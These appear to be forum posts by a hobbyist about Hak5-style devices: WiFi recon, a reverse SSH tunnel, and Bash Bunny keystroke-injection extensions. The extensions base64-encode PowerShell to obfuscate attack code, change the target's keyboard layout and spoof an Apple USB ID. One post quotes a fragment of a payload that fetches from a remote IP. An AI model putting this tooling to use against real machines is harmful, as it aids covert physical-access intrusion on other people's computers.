elkentaro

Why not keep it simple and use a lte mifi spot or GSM modem and have the pineapple setup a reverse ssh pipe to a server online. That way you can connect to it from anywhere...

Longest record that I know of is still 237 miles. https://www.google.co.jp/amp/s/www.wired.com/2007/06/w-wifi-record-2/amp

Yep, +1 for Security Tube, even their free mega-primers are some solid courses.

1.8-1.9 ghz . Good luck , looks like its a DECT security system. (i.e.: 128 bit UAK) https://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications#Security

kismet_server --daemonize will run the kismet server in the background. You can setup the pcap location , wlan etc . settings in /etc/kismet/kismet.conf also sudo systemctl enable gpsd , should set up gpsd to startup on boot.

I run a cron job to dump the data to a sub directory under home. That way I will always have a copy of my recon data.

My latest Nano project : https://medium.com/@elkentaro/hack-chip-and-pineapples-part-8-of-n-c232e2e3c6e7

@evilsocket has dome some offensive setups. https://www.evilsocket.net/2017/08/15/gpd-pocket-7-impressions-gnulinux-installation-and-offensive-setup/

Yea and its not meant as a joke. The battery pack will warm up and so will the nano. In a closed environment , the heat can't disperse as efficiently and could cause issues with power (battery) or the nano.

Downside would be the heat in your pants....

Ah, I see. My bad then.??

Here is a list too : http://www.linux-usb.org/usb.ids

Hm..cool ideas. I'll think about adding some more stuff to it , once I get back from being on the road.

my bad. The very first one had an typo. its fixed now. I guess I shouldn't commit codes at 4am.

So a new extension I wrote to avoid to have to escape special characters for complex powershells. This extension takes a text file containing the powershell command. Example: RUNPOWER switch1/pstxt.txt inside the pstxt.txt file : Set-WinUserLanguageList -LanguageList en-US -force; Basically it takes the contents of the text file and encodes it to a base64 string and passes it to powershell as an encoded command. (also works as obfuscation of the attack code) https://github.com/elkentaro/bashbunny-payloads/blob/master/library/extensions/runpower.sh @elkentaro

New version out. SETKB START will switch it to en-US keyboard, then SETKB DONE will set it back based on windows OS language version, SETKB xx-XX will overwrite to whatever keyboard setting you want. you do have to change the default us.json file to issue a different key code for "-" "-":"00:00:56" Which seems to be the universal key code for "-" on the numpad instead of the keyboard.

I think its cause : \(\’http://192.168.145.138/ztgBcA7n\'\)\; the first one isn't a single quote but a curly apostrophe and the ending is a single quote. and there is no definition for the curly apostrophe ’ in your language.json file.

Thank yea. however I still have some issues with some of the keystrokes. So until I get it all sorted out , I'm holding out. (mainly the issue is with keys that don't exist on a us keyboard , i.e. higher USB HID codes.) But will keep working on it.

So, when I used my older [language].json (based off firmware 1.0 us.json) file it doesn't seem to work, however copying the current us.json file under /usr/local/bunny/lilb/languages and modifiying that file , then putting it into the /languages and have the Bunny copy the file to the location it seems to work. So most likely the issue is with the language file. Once the language file is copied over then you can issue the DUCKY_LANG switch in your payload by DUCKY_LANG ja I have attached the ja.json file as an example. if you want to test out wether your language file is valid and working you can change the key code for an alphabetical entry. I choose to switch "a" lowercase and uppercase. "a": "02,00,04", "A": "00,00,04", This is actually the reverse, but it will allow you to check if your language file is being used. hope this helps. Elkentaro. Sample language file. ja.json

I take back what I said. Sorry @Sebkinne. Seems to be an issue with the language file. I just tried again copying the us.json file to another file and change the key codes, and it seem to be working.

@Sebkinne, I think many of have tried it according to the documentation, however the language file does get copied over to the appropriate directory but does not get called in the QUACK script and hence defaults to the us.json cause of : " language = os.getenv("DUCKY_LANG", default="us")" Initially I thought it could be an issue with the [language].json file I build , however even copying over the us.json , change the name and change 1 keycode for testing , still shows that the language file called is the us.json file. Anyway, still digging around to figure out why. (Now , I could be wrong about this...but then again , "exploration" is what hackers do")

yea , same problem for me. Trying to debug the problem now , but it might take a while. Some how the export of the env variable isn't being honored. 2 work arounds I have found so far, both are not ideal but worked for me. 1. In arming mode connect to the bunny via serial and write the DUCKY_LANG env variable in /etc/profile and set it to whatever your target keyboard is DUCKY_LANG=ja the downside is your keyboard settings will be permanent unless you rewrite the profile settings again. i.e.; you lose flexibility in a multilingual environment . 2. If the target is a windows machine you can use the extension I wrote that will change the layout to a en-US layout and you can set it to back to whatever you want after your attack. The downside of this extension is that its a bit slower, making the attack a lesser "smash and grab" attack. See : Technically there is a 3rd option of rewriting the QUACK file itself , but I don't want to or think its a good idea to screw with the core files.

Not if you are on the new firmware , you can just call it as a command. -----sample payload---- #!/bin/bash ATTACKMODE HID VID_0x05AC PID_0x021d SETKB en-US RUN WIN notepad.exe Q DELAY 5000 Q switch1/quack.txt LED R -------

So with the new firmware 1.1 , we now have extension. Here is my contribution, it sets the input keyboard layout to en-US (US keyboard) to provide an easier way to work with the payloads. Granted there is a DUCKY_LANG option , however its still a bit wanky for me and from reading the forums for some others. This way , you don't need to worry about different layouts. ----------------------------------setkb.sh-------------- #!/bin/bash # # SETKB v1 by @elkentaro # Simplifies executing commands from HID attacks for different language keyboards. on Windows by using Powershell. # Usage: SETKB en-US [give the command the 2 letter combination of keyboard settings] # copy the text of and save it as setkb.sh under /payloads/library/extensions/ # Examples: # SETKB en-US (set the keyboard layout to a US keyboard layout) [usage prior to HID attack] # SETKB ja-JP (set the keyboard layout to a Japanese 106 layout) [usage after HID attack to reset the env] function SETKB() { local kb=$1 shift [[ -z "$kb" ]] && exit 1 # KB keyboard parameter must be given. case "$kb" in 'en-US') QUACK GUI r QUACK DELAY 500 QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force" 　　 QUACK DELAY 1500 QUACK ENTER ;; *) QUACK GUI r QUACK DELAY 500 QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $kb -force" QUACK DELAY 1500 QUACK ENTER ;; esac } export -f SETKB ------------------------------------------------ Minor note: This extension does require that the "-" key is the same key code as the one in us.json .

So yea, I think the issue is with basic keys that don't exist on a US keyboard. (which could include media keys like Volume UP etc) . I assume this is due to the HID descriptor being passed, however not sure if modifying the HID descriptor is the way to go... so for now using powershell to remap the default keyboard layout seems the safest way to go.